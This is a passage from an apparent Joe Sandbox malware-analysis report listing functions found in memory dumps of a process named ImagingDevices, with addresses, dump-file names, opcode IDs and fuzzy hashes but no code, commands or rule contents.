                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID: 0-3916222277
                                                                                                  • Opcode ID: c17805b12b409fbf6d142c0bcbd7036aba549791dea82030305f66f02a2ba447
                                                                                                  • Instruction ID: e1e3eb867f8c667f048ce81ce25c32d706091bf17b640e179cc0755d1f06b013
                                                                                                  • Opcode Fuzzy Hash: c17805b12b409fbf6d142c0bcbd7036aba549791dea82030305f66f02a2ba447
                                                                                                  • Instruction Fuzzy Hash: 3BA1CC71A0464DAAEF24DE64CC41FFE37B5FB59314F0400AEFA46DA182CA74DE909B21
                                                                                                  Function 008A0F3F Relevance: 1.5, Strings: 1, Instructions: 256COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID: 0-3916222277
                                                                                                  • Opcode ID: a8012d96f25005f0b74bb2d48f07e53518960ef7b0e66479764d01430dc5a56e
                                                                                                  • Instruction ID: 3e8959cb1a10463dd46bcb418b62fbedb19a42f7c9e653ed065521bcd03462db
                                                                                                  • Opcode Fuzzy Hash: a8012d96f25005f0b74bb2d48f07e53518960ef7b0e66479764d01430dc5a56e
                                                                                                  • Instruction Fuzzy Hash: 8D81D432A001689BDF28CE6AC89067E7771FB96764F258239D916EB7D4D730ED41CB80
                                                                                                  Function 00870080 Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: [Pj
                                                                                                  • API String ID: 0-2289356113
                                                                                                  • Opcode ID: 1663a565ab183fbfeeb48216b32bf9dc7fb73022466df3339a3496dfb6946d51
                                                                                                  • Instruction ID: 0ce55c395ab72937bc7c9986906d7fe69b6223aab5b21fe1ecc1061ca2dca925
                                                                                                  • Opcode Fuzzy Hash: 1663a565ab183fbfeeb48216b32bf9dc7fb73022466df3339a3496dfb6946d51
                                                                                                  • Instruction Fuzzy Hash: E9F09631208744BBD7129B10CC85F2A7BA9FF85764F14C41CF549AA1D7D776C811EB22
                                                                                                  Function 0091394B Relevance: .9, Instructions: 940COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 7a354022780c619e2f474b2190f2219d15a4ef62e1a6ef39868e59a0d1fba5de
                                                                                                  • Instruction ID: eec3b24c7b08eb1f01dadb9782734aa9946e87fe6b4c6c325ca14c1a433ef8fe
                                                                                                  • Opcode Fuzzy Hash: 7a354022780c619e2f474b2190f2219d15a4ef62e1a6ef39868e59a0d1fba5de
                                                                                                  • Instruction Fuzzy Hash: C072D071E0021D9FDF15CFA8C881BEEBBF9BF48300F198029E955AB291D7799985CB50
                                                                                                  Function 008DA634 Relevance: .8, Instructions: 785COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5c4b65cac88941aa139d1b747a92123c247783b3d38ca169daa9e3dd2f0ac096
                                                                                                  • Instruction ID: 9b8a9b72d70d0605ce38bcdf9ab6795e704ad2539a92bf6614d0c07f7cd25230
                                                                                                  • Opcode Fuzzy Hash: 5c4b65cac88941aa139d1b747a92123c247783b3d38ca169daa9e3dd2f0ac096
                                                                                                  • Instruction Fuzzy Hash: 1A62927680494AEFCF18CF08D4904AEFB62FA51314B65C75AC8AAA7704D331BE54CBD2
                                                                                                  Function 009105E3 Relevance: .7, Instructions: 659COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 51ad3c276c367dbf4d4f6bc93ad0224d44d6673dfdd6cc4bba56842f2bea4f38
                                                                                                  • Instruction ID: 5d80ffbc1602801b2bc80fd1642f56fc518d7241347036e3f3640e17319c9f21
                                                                                                  • Opcode Fuzzy Hash: 51ad3c276c367dbf4d4f6bc93ad0224d44d6673dfdd6cc4bba56842f2bea4f38
                                                                                                  • Instruction Fuzzy Hash: 99529565A0462BCBC7108F1AC4800F9B7A3FFF9311719C156EC914B3A5E6B996E1EBD0
                                                                                                  Function 008D6540 Relevance: .7, Instructions: 652COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bf3aace0eee00dd7d8b9421bd2df7728fa7323d9af3e0e213de9131a621edcaa
                                                                                                  • Instruction ID: 8105c557ab85b7292f4c61937c43d24a40909692a6b6dd5c4a593eb44872254c
                                                                                                  • Opcode Fuzzy Hash: bf3aace0eee00dd7d8b9421bd2df7728fa7323d9af3e0e213de9131a621edcaa
                                                                                                  • Instruction Fuzzy Hash: 6C128273B716180BC344CD7DCC852C27293ABD452875FCA3CAD68CB706F66AED1A6684
                                                                                                  Function 0090F8C4 Relevance: .6, Instructions: 637COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9a058e9ba46eab0b6bc3682cc8be9c9e92a01f7672dcbf8376456b8a694a4e40
                                                                                                  • Instruction ID: 5063a8127bda7c49fc76bc521130147c69e03575eb6527e7edbaa7075a54920b
                                                                                                  • Opcode Fuzzy Hash: 9a058e9ba46eab0b6bc3682cc8be9c9e92a01f7672dcbf8376456b8a694a4e40
                                                                                                  • Instruction Fuzzy Hash: 6B42FA72818236CFC7204F05C4A01B67BA1FF6875572A446EEDC21BB91E7789A91F7E0
                                                                                                  Function 0091443E Relevance: .6, Instructions: 565COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: fbfc32c196d61b767b6a6a8132ee964692caf7711aa8cb9cea579ec6da776bf1
                                                                                                  • Instruction ID: 59e967fe57cd5e2e6df2cc85123fed5d1dc48b8c1e2538e2ac86111eba65a324
                                                                                                  • Opcode Fuzzy Hash: fbfc32c196d61b767b6a6a8132ee964692caf7711aa8cb9cea579ec6da776bf1
                                                                                                  • Instruction Fuzzy Hash: 2A328971E002199FDB15CF98C881BEEFBF5FF48304F19805AE859AB251D735A981CBA0
                                                                                                  Function 0093CBA4 Relevance: .5, Instructions: 529COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e9bf8e2060619415f811d5769a4d91fd693ce594ecb1947689e297aeb271b434
                                                                                                  • Instruction ID: a311c805f3ff1058dfca7adfd180c1a4b74411923ceaf2b58dc7d562fac5dae7
                                                                                                  • Opcode Fuzzy Hash: e9bf8e2060619415f811d5769a4d91fd693ce594ecb1947689e297aeb271b434
                                                                                                  • Instruction Fuzzy Hash: 7A2288B1900618CFDB24CFA8D884AEDBBF4FF08314F15856AE859BB291D375A885CF54
                                                                                                  Function 00892305 Relevance: .5, Instructions: 528COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: cb2938d440f582dd7e6c9f0390cb7aecfc182f6c7e12175bd79fa6095ad5dc3d
                                                                                                  • Instruction ID: 98d5d42fd4ddc5f87a691ff20124fd97feb39abf19e2915b972f203cbd62c936
                                                                                                  • Opcode Fuzzy Hash: cb2938d440f582dd7e6c9f0390cb7aecfc182f6c7e12175bd79fa6095ad5dc3d
                                                                                                  • Instruction Fuzzy Hash: 4802C333D49BB74B8F715EF944E052A7EA0AE0169031F87E9DDC0BF296C116DD0A96E0
                                                                                                  Function 0091DBDA Relevance: .5, Instructions: 504COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3db4aff7ae743eae0f5b64c8dc9487327da86f4be592e369025056bd2969c8d4
                                                                                                  • Instruction ID: c0a45c8260f345aa6d1d09f14a5a11b2eac41cd3e0e247d7c467d4cc84447221
                                                                                                  • Opcode Fuzzy Hash: 3db4aff7ae743eae0f5b64c8dc9487327da86f4be592e369025056bd2969c8d4
                                                                                                  • Instruction Fuzzy Hash: 6812D1743192599BDB29CF29C4847F2B7E4BF05300F148899ECD68B692D378E9D1DB60
                                                                                                  Function 008B286D Relevance: .5, Instructions: 460COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4884cdbbaa9c74f7320a8cd71e195fdf8dcd0243339ec7d775a4836e6909e336
                                                                                                  • Instruction ID: fa7f2c62cdbc76a1d369353c5b1423e2ac1c405d2e7e25e547ecc2b665b3d185
                                                                                                  • Opcode Fuzzy Hash: 4884cdbbaa9c74f7320a8cd71e195fdf8dcd0243339ec7d775a4836e6909e336
                                                                                                  • Instruction Fuzzy Hash: 57027D7090012A9ACF349F58C888BF9B7B1FF18315F5441EAE949E72A1E7348ED1DB91
                                                                                                  Function 00410283 Relevance: .4, Instructions: 435COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497434362.0000000000401000.00000040.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497429027.0000000000400000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_400000_ImagingDevices.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                                                  • Instruction ID: dc294a66bada596b6226b8cbcd491371d24655888977af4e4335b955a7c730bc
                                                                                                  • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                                                  • Instruction Fuzzy Hash: B7026E73E547164FE720CE4ACDC4765B3A3EFC8301F5B81B8CA142B613CA79BA525A90
                                                                                                  Function 00902FDC Relevance: .4, Instructions: 400COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0e72521bac987bfed74f6657b8d3766b52d56a2e364ff41e8eea70b3df52c951
                                                                                                  • Instruction ID: e57fd1730ceec70096c49c67a32c3f9c8924f3e7dffbc4def85a9b7348c30026
                                                                                                  • Opcode Fuzzy Hash: 0e72521bac987bfed74f6657b8d3766b52d56a2e364ff41e8eea70b3df52c951
                                                                                                  • Instruction Fuzzy Hash: 30E1AF76B0420A9BDF14CF98D851BFEB7B9FB48304F198428E955D7281E778E981CB90
                                                                                                  Function 00932622 Relevance: .4, Instructions: 398COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 45384a2fc5b720c5a9a2b5fce7a5d8eb782718bcec4925c3f91cf8b3f3a0b502
                                                                                                  • Instruction ID: d0c1c0c047fec0a961a2718d1cb46e1b6cebf6d8e715e95c11a14a4d9d8229d7
                                                                                                  • Opcode Fuzzy Hash: 45384a2fc5b720c5a9a2b5fce7a5d8eb782718bcec4925c3f91cf8b3f3a0b502
                                                                                                  • Instruction Fuzzy Hash: 86E1BD342146518FC728CF19C5A06B2B7E5BF55310F24885EE8E78F692E339E856EF60
                                                                                                  Function 0089C7BC Relevance: .3, Instructions: 333COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0b327ebcb93f53b975ddc1f021e09aef2cc5c92dc740633e13822ee041347358
                                                                                                  • Instruction ID: 34f6ccf25957ec0cf6eadd04bed28925a68c9566fa8a0de7a080c1a9b15f560e
                                                                                                  • Opcode Fuzzy Hash: 0b327ebcb93f53b975ddc1f021e09aef2cc5c92dc740633e13822ee041347358
                                                                                                  • Instruction Fuzzy Hash: 65C1377050069AEFDB25CF26C884BBABBF4FF56304F08445DE886CB581D775A845EBA0
                                                                                                  Function 008A905A Relevance: .3, Instructions: 283COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
